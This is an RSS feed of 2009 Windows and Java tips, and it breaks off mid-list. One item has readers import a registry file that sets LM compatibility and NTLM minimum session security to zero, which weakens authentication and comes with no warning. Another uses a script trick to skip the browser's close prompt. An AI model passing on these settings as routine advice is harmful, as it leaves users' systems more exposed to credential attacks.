<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Information World &#187; Technical</title>
	<atom:link href="http://www.dailyinfobyte.com/category/technical/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.dailyinfobyte.com</link>
	<description>Technical Tips and more...</description>
	<lastBuildDate>Thu, 12 Nov 2009 07:57:26 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.4</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>How to enable NTLM in windows using regedit?</title>
		<link>http://www.dailyinfobyte.com/2009/11/11/how-to-enable-ntlm-in-windows-using-regedit/</link>
		<comments>http://www.dailyinfobyte.com/2009/11/11/how-to-enable-ntlm-in-windows-using-regedit/#comments</comments>
		<pubDate>Thu, 12 Nov 2009 05:09:58 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Technical]]></category>
		<category><![CDATA[HKEY_LOCAL_MACHINE]]></category>
		<category><![CDATA[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]]></category>
		<category><![CDATA[How to enable NTLM in windows using regedit?]]></category>
		<category><![CDATA[ntlmminclientsec]]></category>
		<category><![CDATA[Using Windows Registry – Creating a .reg file]]></category>
		<category><![CDATA[Windows Registry Editor Version 5.00]]></category>

		<guid isPermaLink="false">http://www.dailyinfobyte.com/?p=291</guid>
		<description><![CDATA[Using Windows Registry – Creating a .reg file
 a.     Create a text file.
b.    Copy the following entries (in bold) and paste in the text file (it is very important to keep these entries as it is with the blank spaces and line breaks):
 Windows Registry Editor Version 5.00
 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
&#8220;lmcompatibilitylevel&#8221;=dword:00000000
 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0]
&#8220;ntlmminclientsec&#8221;=dword:00000000
&#8220;ntlmminserversec&#8221;=dword:00000000
 
c.     Save the file as ntlm.reg.
d.    Double click on ntlm.reg [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Using Windows Registry – Creating a .reg file</strong></p>
<p><strong> </strong>a.     Create a text file.</p>
<p>b.    Copy the following entries (in bold) and paste in the text file (it is very important to keep these entries as it is with the blank spaces and line breaks):</p>
<p><strong> </strong><strong>Windows Registry Editor Version 5.00</strong></p>
<p><strong> </strong><strong>[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]</strong></p>
<p><strong>&#8220;lmcompatibilitylevel&#8221;=dword:00000000</strong></p>
<p><strong> </strong><strong>[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0]</strong></p>
<p><strong>&#8220;ntlmminclientsec&#8221;=dword:00000000</strong></p>
<p><strong>&#8220;ntlmminserversec&#8221;=dword:00000000</strong></p>
<p><strong> </strong></p>
<p>c.     Save the file as ntlm.reg.</p>
<p>d.    Double click on ntlm.reg and click “Yes” in the dialog box that appears next asking you whether you want to save the changes in the registry.</p>
<p><strong> </strong></p>
<p><strong>Note: </strong>Please ensure that the first line of your .reg file reads “<strong>Windows Registry Editor Version 5.00</strong>” for Windows 2000, Windows XP and Windows Server 2003 based machines or “<strong>REGEDIT4</strong>” for Windows 98 and Windows NT 4.0 based computers.<strong> </strong></p>
]]></content:encoded>
			<wfw:commentRss>http://www.dailyinfobyte.com/2009/11/11/how-to-enable-ntlm-in-windows-using-regedit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to close a window without prompt?</title>
		<link>http://www.dailyinfobyte.com/2009/11/10/how-to-close-a-window-without-prompt/</link>
		<comments>http://www.dailyinfobyte.com/2009/11/10/how-to-close-a-window-without-prompt/#comments</comments>
		<pubDate>Tue, 10 Nov 2009 08:19:43 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Technical]]></category>
		<category><![CDATA[]]></category>
		<category><![CDATA[closing a jsp]]></category>
		<category><![CDATA[closing a servlet window]]></category>
		<category><![CDATA[How to close a window without prompt?]]></category>
		<category><![CDATA[HTML]]></category>
		<category><![CDATA[Java script]]></category>
		<category><![CDATA[JSP]]></category>
		<category><![CDATA[servlet]]></category>
		<category><![CDATA[window.close()]]></category>
		<category><![CDATA[window.opener = top;]]></category>

		<guid isPermaLink="false">http://www.dailyinfobyte.com/?p=288</guid>
		<description><![CDATA[How to close a window without prompt?
For servlet:
        out.println (&#8221;&#60;script&#62;&#8221;);
        out.println (&#8221;window.opener = top;&#8221;);
        out.println (&#8221;window.close()&#8221;);
        out.println (&#8221;&#60;/script&#62;&#8221;);
For html or jsp:
         &#60;script&#62;
        window.opener = top;
        window.close();
        &#60;/script&#62;
]]></description>
			<content:encoded><![CDATA[<p>How to close a window without prompt?</p>
<p>For servlet:</p>
<p>        out.println (&#8221;&lt;script&gt;&#8221;);<br />
        out.println (&#8221;window.opener = top;&#8221;);<br />
        out.println (&#8221;window.close()&#8221;);<br />
        out.println (&#8221;&lt;/script&gt;&#8221;);</p>
<p>For html or jsp:</p>
<p>         &lt;script&gt;<br />
        window.opener = top;<br />
        window.close();<br />
        &lt;/script&gt;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.dailyinfobyte.com/2009/11/10/how-to-close-a-window-without-prompt/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>MS SQL Server 2000 authentication modes</title>
		<link>http://www.dailyinfobyte.com/2009/10/06/ms-sql-server-2000-authentication-modes/</link>
		<comments>http://www.dailyinfobyte.com/2009/10/06/ms-sql-server-2000-authentication-modes/#comments</comments>
		<pubDate>Tue, 06 Oct 2009 13:07:51 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Technical]]></category>
		<category><![CDATA[("jdbc:jtds:sqlserver://servernaem or IP address:port no/database name;user=domain username;password=password;domain=Domain name");]]></category>
		<category><![CDATA[Connection strings  used for NT security mode]]></category>
		<category><![CDATA[Connection strings used for NT security mode using JTDS driver:]]></category>
		<category><![CDATA[JDBC Driver]]></category>
		<category><![CDATA[JTDS Driver]]></category>
		<category><![CDATA[Microsoft SQL Server]]></category>
		<category><![CDATA[Microsoft SQL Server JDBC Driver]]></category>
		<category><![CDATA[Mixed mode]]></category>
		<category><![CDATA[MS SQL Server 2000 authentication modes]]></category>
		<category><![CDATA[NT security mode]]></category>
		<category><![CDATA[NTLM Authentication]]></category>
		<category><![CDATA[SQL Server Authentication]]></category>
		<category><![CDATA[Trouble shooting Login failed for user]]></category>
		<category><![CDATA[Trouble shooting Login failed for user: Null]]></category>
		<category><![CDATA[User doesn’t have access to the database]]></category>
		<category><![CDATA[Windows NT Authentication]]></category>

		<guid isPermaLink="false">http://www.dailyinfobyte.com/?p=231</guid>
		<description><![CDATA[With Microsoft SQL Database Server 2000 you can choose either of the two security (authentication) modes, namely:

NT security mode (Windows NT Authentication only),
Mixed mode (Windows NT Authentication and SQL Server Authentication).

 NT security mode (Windows NT Authentication only):
It is related to windows domain. Access will be given to existing domain user account.Using those credentials, user can [...]]]></description>
			<content:encoded><![CDATA[<p>With Microsoft SQL Database Server 2000 you can choose either of the two security (authentication) modes, namely:</p>
<ul>
<li>NT security mode<em> (Windows NT Authentication only)</em>,</li>
<li>Mixed mode (<em>Windows NT Authentication and SQL Server Authentication</em>).</li>
</ul>
<p> <strong>NT security mode<em> (Windows NT Authentication only)</em>:</strong></p>
<p>It is related to windows domain. Access will be given to existing domain user account.Using those credentials, user can access the database.Separate account is not created as in other databases.</p>
<p> <strong>Mixed mode (<em>Windows NT Authentication and SQL Server Authentication</em>)</strong></p>
<p>In these modes, both domain accounts and database accounts can be used to access the database.</p>
<p><span style="text-decoration: underline;"> JDBC drivers available for Microsoft SQL Database Server 2000:</span></p>
<p>      1. <a href="http://jtds.sourceforge.net/">JTDS Driver</a></p>
<p>JTDS driver works in both NT security mode and mixed mode.</p>
<p>      2. <a href="http://msdn.microsoft.com/en-us/data/aa937724.aspx">Microsoft SQL Server JDBC Driver</a></p>
<p>MS SQL server JDBC driver works in mixed mode only.</p>
<p> </p>
<p><strong><span style="text-decoration: underline;">Connection strings used for NT security mod<em>e </em>using JTDS driver:</span></strong></p>
<p>Ex:</p>
<p>con = java.sql.DriverManager.getConnection(&#8221;jdbc:jtds:sqlserver://servernaem or IP address:port no/database name;user=domain username;password=password;domain=Domain name&#8221;);</p>
<p>This string works in both windows and non-windows. This is not ntlm authentication method.</p>
<p>or</p>
<p>con = java.sql.DriverManager.getConnection(&#8221;jdbc:jtds:sqlserver://servernaem or IP address:port no/database name;&#8221;);</p>
<p>This method uses NTLM authentication. So NTLMauth.dll has to be copied to the system path. [ It is available along with JTDS driver. ]</p>
<p> </p>
<p><span style="text-decoration: underline;">Trouble shooting:</span></p>
<ol>
<li>Login failed for user: XXX</li>
<li>Login failed for user: Null</li>
</ol>
<p>The above errors occur, when you try to access the ms sql database from remote machines or applications.</p>
<ol>
<li>User doesn’t have access to the database.</li>
</ol>
<p>      2.   You may be trying to access the database using database account and ms sql server might have been set to NT security mod<em>e.</em></p>
<p>      3.    User is accessing the database from windows domain account and he has access to it. But still getting error message means, he didn’t implement NTLM method correctly or didn’t give correct credentials. Please check the connection strings given in above section.</p>
<p> For any questions or issues, leave comments here.</p>
<p> </p>
<p><strong> </strong></p>
]]></content:encoded>
			<wfw:commentRss>http://www.dailyinfobyte.com/2009/10/06/ms-sql-server-2000-authentication-modes/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to open multiple tabs of Mozilla in same window using batch file</title>
		<link>http://www.dailyinfobyte.com/2009/07/28/how-to-open-multiple-tabs-of-mozilla-in-same-window-using-batch-file/</link>
		<comments>http://www.dailyinfobyte.com/2009/07/28/how-to-open-multiple-tabs-of-mozilla-in-same-window-using-batch-file/#comments</comments>
		<pubDate>Tue, 28 Jul 2009 12:41:56 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Technical]]></category>
		<category><![CDATA["C:\Program Files\Mozilla Firefox\firefox.exe"]]></category>
		<category><![CDATA[batch file]]></category>
		<category><![CDATA[How to open multiple tabs of Mozilla in same window]]></category>
		<category><![CDATA[How to open multiple tabs of Mozilla in same window using batch file:]]></category>
		<category><![CDATA[mozilla firefox]]></category>
		<category><![CDATA[opening multiple tabs in same window using batch file]]></category>
		<category><![CDATA[We can open multiple tabs in same window using the following batch file.]]></category>

		<guid isPermaLink="false">http://www.dailyinfobyte.com/?p=213</guid>
		<description><![CDATA[We can open multiple tabs in same window using the following batch file.
Step 1: Create a batch file
Step 2: Copy the following in the file and save it
 
&#34;C:Program FilesMozilla Firefoxfirefox.exe&#34; -url   &#34;www.google.com&#34; &#34;www.yahoo.com&#34;
Step 3: Run the file
]]></description>
			<content:encoded><![CDATA[<p class="MsoNormal" style="margin: 0in 0in 10pt;"><span style="font-size: small; font-family: Calibri;">We can open multiple tabs in same window using the following batch file.</span></p>
<p class="MsoNormal" style="margin: 0in 0in 10pt;"><span style="font-size: small; font-family: Calibri;">Step 1: Create a batch file</span></p>
<p class="MsoNormal" style="margin: 0in 0in 10pt;"><span style="font-size: small; font-family: Calibri;">Step 2: Copy the following in the file and save it</span></p>
<p class="MsoNormal" style="margin: 0in 0in 10pt;"><span style="font-size: small; font-family: Calibri;"> </span></p>
<p class="MsoNormal" style="margin: 0in 0in 10pt 0.5in;"><span style="font-size: small; font-family: Calibri;">&quot;C:Program FilesMozilla Firefoxfirefox.exe&quot; -url <span style="mso-spacerun: yes;"> </span> &quot;www.google.com&quot; &quot;www.yahoo.com&quot;</span></p>
<p class="MsoNormal" style="margin: 0in 0in 10pt;"><span style="font-size: small; font-family: Calibri;">Step 3: Run the file</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.dailyinfobyte.com/2009/07/28/how-to-open-multiple-tabs-of-mozilla-in-same-window-using-batch-file/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Top Windows XP secrets</title>
		<link>http://www.dailyinfobyte.com/2009/07/28/top-windows-xp-secrets/</link>
		<comments>http://www.dailyinfobyte.com/2009/07/28/top-windows-xp-secrets/#comments</comments>
		<pubDate>Tue, 28 Jul 2009 08:18:18 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Technical]]></category>
		<category><![CDATA[Access Task Manager with shortcut]]></category>
		<category><![CDATA[ALT + ENTER]]></category>
		<category><![CDATA[Edit sysoc.inf to list all software]]></category>
		<category><![CDATA[Go to Task Manager]]></category>
		<category><![CDATA[Lock Windows to protect computer]]></category>
		<category><![CDATA[Rename multiple files in Windows at once]]></category>
		<category><![CDATA[Run program as diffrent user]]></category>
		<category><![CDATA[Stop treating ZIP files like Folders]]></category>
		<category><![CDATA[Switch users leaving applications opened]]></category>
		<category><![CDATA[Top Windows XP secrets]]></category>
		<category><![CDATA[Useful key shortcuts]]></category>
		<category><![CDATA[Useful key shortcuts availabl]]></category>
		<category><![CDATA[Windows XP comes with IPv4 and IPv6]]></category>

		<guid isPermaLink="false">http://www.dailyinfobyte.com/?p=212</guid>
		<description><![CDATA[Top Windows XP secrets 
15 Top Windows XP secrets :  
 

Useful key shortcuts available:   

Windows key + D &#8211; shows the desktop. 
Windows key + M &#8211; minimizes all open windows. 
Windows key + Shift + M &#8211; maximizes all open windows. 
Windows key + E &#8211; Runs Windows Explorer. 
Windows key [...]]]></description>
			<content:encoded><![CDATA[<p class="MsoNormal" style="background: #3c74e6; margin: 0in 0in 0pt; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto;"><strong><span style="font-size: 10pt; text-transform: uppercase; color: white; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;;">Top Windows XP secrets</span> </strong></p>
<p class="MsoNormal" style="margin: 0in 0in 0pt; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto;"><strong><span style="font-size: 10pt; color: #333333; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;;">15 Top Windows XP secrets : </span> </strong></p>
<p class="MsoNormal" style="margin: 0in 0in 0.25in; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto;"><span style="font-size: 10pt; color: #414141; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;;"> </span></p>
<ol type="1">
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level1 lfo1; tab-stops: list .5in;"><strong><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Useful key shortcuts available:</span> </strong> <span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';"> </span>
<ul type="circle">
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Windows key + D &#8211; shows the desktop. </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Windows key + M &#8211; minimizes all open windows. </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Windows key + Shift + M &#8211; maximizes all open windows. </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Windows key + E &#8211; Runs Windows Explorer. </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Windows key + R &#8211; shows the RUN dialog. </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Windows key + F &#8211; shows Search window. </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Windows key + Break &#8211; shows System Properties box. </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Windows key + TAB &#8211; Go through taskbar applications. </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Windows key + PAUSE Display the System Properties dialog box. </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Windows key + U Open Utility Manager. </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">ALT + TAB &#8211; Cycle through opened applications. </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Hold down CTRL while dragging an item to Copy it. </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">CTRL + ESC Display the Start menu. </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">ALT + ENTER View the properties for the selected item. </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">F4 key Display the Address bar list in My Computer or </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">NUM LOCK + Asterisk (*) Display all of the subfolders that are under the selected folder. </span></li>
</ul>
</li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level1 lfo1; tab-stops: list .5in;"><strong><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Lock Windows to protect computer :</span> </strong> <span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';"><br />
You can lock Windows to protect the computer when leaving the station easily by creating a shortcut with the path rundll32.exeuser32.dll, LockWorkStation. The Windows key + L is also a shortcut to this feature. </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level1 lfo1; tab-stops: list .5in;"><strong><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Edit sysoc.inf to list all software : </span> </strong> <span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';"><br />
To show all software that can be removed from your computer (including protected Windows services), you can manually edit (using notepad for example) the sysoc.inf file located in Windows\inf\. Just remove the word hide next to the software pack.<br />
<strong>Note</strong> &#8211; use this at your own risk. Removing critical components of the system will make Windows instable. </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level1 lfo1; tab-stops: list .5in;"><strong><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Windows XP comes with IPv4 and IPv6 :</span> </strong> <span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';"><br />
Windows XP comes both IPv4 and IPv6 support. To enable IPv6, you can install the protocols needed with the command &quot;ipv6 install&quot; in the command-prompt. Then type ipv6 /? to see the options. The installation will not remove the IPv4 protocols so your current configuration will still work. </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level1 lfo1; tab-stops: list .5in;"><strong><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Access Task Manager with shortcut :</span> </strong> <span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';"><br />
To access the Task Manager easier, you can make a shortcut that points to %windir%\system32\taskmgr.exe. </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level1 lfo1; tab-stops: list .5in;"><strong><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Stop treating ZIP files like Folders :</span> </strong> <span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';"><br />
If you don&#8217;t want your Windows XP to treat ZIP files like folders, you can disable this component by running regsvr32 /u zipfldr.dll at the command prompt or Run dialog. If you start missing it, you can enable it by typing regsvr32 zipfldr.dll. </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level1 lfo1; tab-stops: list .5in;"><strong><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Run program as diffrent user : </span> </strong> <span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';"><br />
You can run a program as a different user. Right click an application and select Run As command. </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level1 lfo1; tab-stops: list .5in;"><strong><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Switch users leaving applications opened :</span> </strong> <span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';"><br />
You can switch users leaving the applications opened too (*NOTE* use this only when needed since it could lead to system instability).<br />
<strong>Go to Task Manager </strong> &#8211; processes and end the process explorer.exe. This will end only your session and not all applications. Then go to Applications tab, click New task and type runas /user:domainname\username explorer.exe. A password prompt will appear to login to the desired username. The user&#8217;s session will start, with all your previously applications running.<br />
I recommend to open first a command-line prompt and type runas /? to see all the options available. </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level1 lfo1; tab-stops: list .5in;"><strong><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Rename multiple files in Windows at once :</span> </strong> <span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';"><br />
Rename multiple files in Windows at once. Select them all, right click and select Rename. Enter the desired name. They will be renamed using what you specified, with a number in brackets to distinguish them. </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level1 lfo1; tab-stops: list .5in;"><strong><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Task kill feature in Windows :</span> </strong> <span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';"><br />
Windows has a task kill feature similar to Linux. Go to a command prompt and run the command tasklist to see running processes with PID numbers. Then type tskill &lt;PID&gt; to end the specific task. This forces an instant closing of the task. </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level1 lfo1; tab-stops: list .5in;"><strong><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Edit features with GPEDIT.MSC </span> </strong> <span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">:<br />
You can edit many features by running gpedit.msc. You can add log on/log off scripts here and many features. </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level1 lfo1; tab-stops: list .5in;"><strong><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Edit accounts in the command prompt : </span> </strong> <span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';"><br />
You can edit accounts by running &quot;control userpasswords2&quot; at the command prompt. </span></li>
